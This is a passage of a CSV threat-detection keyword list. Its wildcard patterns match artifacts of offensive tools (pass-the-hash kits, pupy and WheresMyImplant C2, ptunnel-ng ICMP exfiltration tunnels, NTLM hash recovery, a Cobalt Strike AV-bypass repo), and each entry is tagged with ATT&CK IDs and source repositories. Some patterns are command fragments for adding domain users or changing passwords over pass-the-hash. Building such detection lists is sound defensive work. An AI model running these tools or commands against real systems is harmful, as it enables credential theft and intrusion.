even though the programs themselves have no malicious payload.,N/A,N/A,N/A,N/A,Credential Access,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PtC.exe challenge*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe compare*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe inject*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe nthash *,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe ping*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*PtC.exe protect*,offensive_tool_keyword,PassTheChallenge,Recovering NTLM hashes from Credential Guard,T1552.004,TA0003,N/A,N/A,Exploitation tools,https://github.com/ly4k/PassTheChallenge,1,0,N/A,N/A,4,308,22,2022-12-26T01:09:18Z,2022-12-26T00:56:40Z -*pth-net rpc group members *Domain admins*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc group members *Exchange Servers*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc password * -U * -S *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-net rpc user add * -U *-S *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pth-rpcclient*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-smbclient*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - 
T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTHSMBClientDelete*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientGet*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientList*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBClientPut*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*PTHSMBExec*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*pth-smbget*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-toolkit*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-winexe*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*pth-wmic*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTHWMIExec*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - 
T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*pth-wmis*,offensive_tool_keyword,pth-toolkit,A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems,T1550 - T1075 - T1110 - T1021,TA0002 - TA0003 - TA0005,N/A,N/A,Lateral movement,https://github.com/byt3bl33d3r/pth-toolkit,1,1,N/A,N/A,6,509,134,2015-02-06T15:10:41Z,2015-02-03T10:31:56Z -*PTRACE_SETOPTIONS failure*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*ptresearch/AttackDetection*,offensive_tool_keyword,POC,POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. 
so we develop Suricata rules for detecting all sorts of such activities.,T1210 - T1583 - T1586 - T1589 - T1596,TA0002 - TA0011 - TA0007,N/A,N/A,Exploitation tools,https://github.com/ptresearch/AttackDetection,1,1,N/A,N/A,10,1266,367,2022-08-31T09:26:21Z,2016-03-24T14:42:50Z -*ptunnel-client.log*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-data-recv*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-data-send*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-master*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng *,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.conf*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.git*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - 
T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.service*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng.te*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x64.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x64-dbg.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x86.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-ng-x86-dbg.exe*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -*ptunnel-server.log*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data 
Exfiltration,https://github.com/utoni/ptunnel-ng,1,1,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z
-*Public\dcinst.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z
-*pupy*/checkvm.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*pupy/payload_*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyCmdLoop*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyCredentials.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyDnsCnc.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyDnsCommandServerHandler*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*pupygen.py *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyKCPSocketStream*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyLoaderTemplate.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyOffloadDNS*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyOffloadSocket*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupySocketStream.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*PupyVirtualStream.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z
-*pureqh/bypassAV*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pureqh/bypassAV,1,1,N/A,10,10,434,101,2021-05-18T05:03:03Z,2021-02-25T05:26:11Z
-*purevpn_cred_collector.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*purplepanda.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
-*purplepanda_config.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. 
Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
-*purplepanda_github.py*,offensive_tool_keyword,PurplePanda,This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.,T1595 - T1078 - T1583 - T1087 - T1526,TA0003 - TA0004 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/carlospolop/PurplePanda,1,1,N/A,N/A,6,569,80,2023-08-07T04:13:59Z,2022-01-01T12:10:40Z
